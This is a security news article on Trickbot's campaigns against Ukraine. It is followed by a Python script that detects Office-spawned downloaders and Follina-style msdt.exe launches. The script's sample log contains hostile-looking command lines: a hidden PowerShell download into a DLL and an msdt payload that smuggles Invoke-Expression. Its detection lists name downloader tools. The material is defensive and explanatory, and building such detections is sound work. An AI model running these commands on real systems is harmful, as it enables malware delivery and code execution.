In Switch, Trickbot Group Now Attacking Ukrainian Targets

Published: 23/11/2024   Category: security




Latest campaigns are a break from its usual financially motivated attacks and appear aligned with Russian interests, security researchers say.



In a break from precedent, Russia's hitherto purely financially motivated Trickbot threat group has been systematically attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.
Researchers from IBM's X-Force threat intelligence group this week said they had uncovered two campaigns — and analyzed four others that Ukraine's Computer Emergency Response Team (CERT-UA) disclosed — in which Trickbot went after targets in Ukraine. The campaigns began after Russia's invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to grab the attention of Ukrainian users, including some that are war-related.
The attacks mark an unprecedented shift for Trickbot, and it's notable because threat groups in former Soviet Union states have typically avoided attacking targets in each other's countries, IBM said.
Prior to the Russian invasion, ITG23, the name by which IBM tracks Trickbot, had not been known to target Ukraine. Much of the group's malware was even configured not to execute on systems where the Ukrainian language was detected, IBM said in a report summarizing its findings this week. ITG23's campaigns against Ukraine are notable, IBM wrote, because of the extent to which this activity differs from historical precedent and because the campaigns appeared specifically aimed at Ukraine, with some payloads that suggest a higher degree of target selection.
IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads and a new malware encryption and obfuscation tool.
One of the two Trickbot campaigns that IBM uncovered took place in early May. In those attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor onto compromised systems. AnchorMail is a revamped version of Trickbot's AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described AnchorDNS as notable for communicating with its command-and-control (C2) server over the DNS protocol; AnchorMail replaces that channel with email, talking to its C2 over SMTP and IMAP.
The second recent Trickbot campaign that IBM X-Force researchers spotted likely occurred in late May or early June. In that campaign, Trickbot actors used an ISO image file — an archive containing the contents of an optical disk — as part of an attack chain to drop the Cobalt Strike post-exploitation kit on target systems. ISO lures were popular at the time because files inside a mounted image did not carry the Mark-of-the-Web, so the usual SmartScreen and Office Protected View warnings never appeared. In June, Trickbot actors were observed exploiting the so-called "Follina" zero-day bug (CVE-2022-30190) in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.
The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor; Meterpreter, the Metasploit attack payload; and Cobalt Strike. In five of the six observed campaigns, Trickbot actors downloaded Cobalt Strike, AnchorMail, or Meterpreter directly onto target systems — another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests these attacks are part of targeted campaigns in which ITG23 is willing to immediately deploy higher-value backdoors.
IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to fetch malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically when the file is opened — provided the user has macros enabled, which is exactly the case that blocking macros in files downloaded from the internet is meant to close off. The new dropper for AnchorMail that IBM observed is a WinRAR self-extracting archive (SFX). The dropper is rigged to extract and execute a script that builds and configures AnchorMail on infected systems.
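Both the macro downloader just described and the Follina chain mentioned earlier share a detectable trait: an Office application spawning a process it has no business launching, often with a download URL on the command line. The following Python is an added example (not code from IBM X-Force, CERT-UA or this article) of that detection logic run over a handful of constructed process-creation records in a hypothetical `parent|image|commandline` layout standing in for Sysmon event ID 1 or EDR telemetry. The Follina indicators (msdt.exe launched by an Office app with an `ms-msdt:` URI and an `IT_BrowseForFile` parameter) come from public analyses of the bug, not from this page, and every path, command line and the 203.0.113.10 address in the sample log is made up.

```python
"""Flag Office-spawned script hosts, downloaders and msdt.exe from process-creation records.

Added example; the record format and all sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Parent processes that should not normally launch shells, script hosts or msdt.exe.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children commonly used by macro droppers to fetch or run a second stage.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one 'parent|image|commandline' record (hypothetical layout).

    The command line is the third field and may itself contain '|'.
    """
    parts = line.rstrip("\n").split("|", 2)
    if len(parts) != 3:
        raise ValueError(f"malformed record: {line!r}")
    parent, image, cmd = (p.strip() for p in parts)
    return ProcEvent(parent, image, cmd)


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection labels that apply to one event (empty list = benign)."""
    findings: list[str] = []
    parent = _basename(ev.parent_image)
    child = _basename(ev.image)
    cmd = ev.command_line.lower()

    # Macro downloader pattern: Office app -> script host, often with a hard-coded URL.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
        if URL_RE.search(ev.command_line):
            findings.append("office-child-download-url")

    # Follina pattern: Office app -> msdt.exe via the ms-msdt: protocol handler.
    if child == "msdt.exe":
        if parent in OFFICE_APPS:
            findings.append("office-spawned-msdt")
        if "ms-msdt:" in cmd and "it_browseforfile" in cmd:
            findings.append("follina-msdt-cmdline")

    return findings


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map record index -> findings for every record that triggered at least one rule."""
    hits: dict[int, list[str]] = {}
    for idx, line in enumerate(lines):
        labels = classify(parse_event(line))
        if labels:
            hits[idx] = labels
    return hits


# Constructed sample telemetry: two benign records and two malicious ones.
SAMPLE_LOG = [
    # benign: user launches Excel from the shell
    r"C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|EXCEL.EXE /dde",
    # macro downloader: Excel spawns PowerShell with a hard-coded URL (203.0.113.10 is documentation space)
    r'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "Invoke-WebRequest http://203.0.113.10/update.dat -OutFile C:\Users\Public\u.dll"',
    # Follina-style chain: Word launches msdt.exe through the ms-msdt: handler
    r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\msdt.exe|msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Get-Content C:\Users\Public\stage.txt)))"',
    # benign: admin runs ping from a console
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\PING.EXE|ping 10.0.0.1",
]


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(f"record {idx}: {', '.join(labels)}")
```

Tune OFFICE_APPS and SCRIPT_HOSTS to the estate's own process tree. A URL on the child's command line is a strong signal for hard-coded downloaders like the one IBM describes, but a macro that fetches its payload through a WinHTTP COM object from inside the Office process creates no child process at all, so pair this with network telemetry (Sysmon event ID 3) keyed on the Office image.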
Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymous malware to steal credentials for banking accounts. Over the years, the group evolved into a sort of initial access broker and a distributor for several ransomware and malware tools, most notably Conti, Ryuk, and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.
Court documents in connection with the arrest of a key member of the group last year showed that nearly 20 cybercriminals — including several malware experts — collaborated in building the malware. A massive 2020 international law enforcement operation to take the threat actor down temporarily disrupted its activities but failed to stop them.
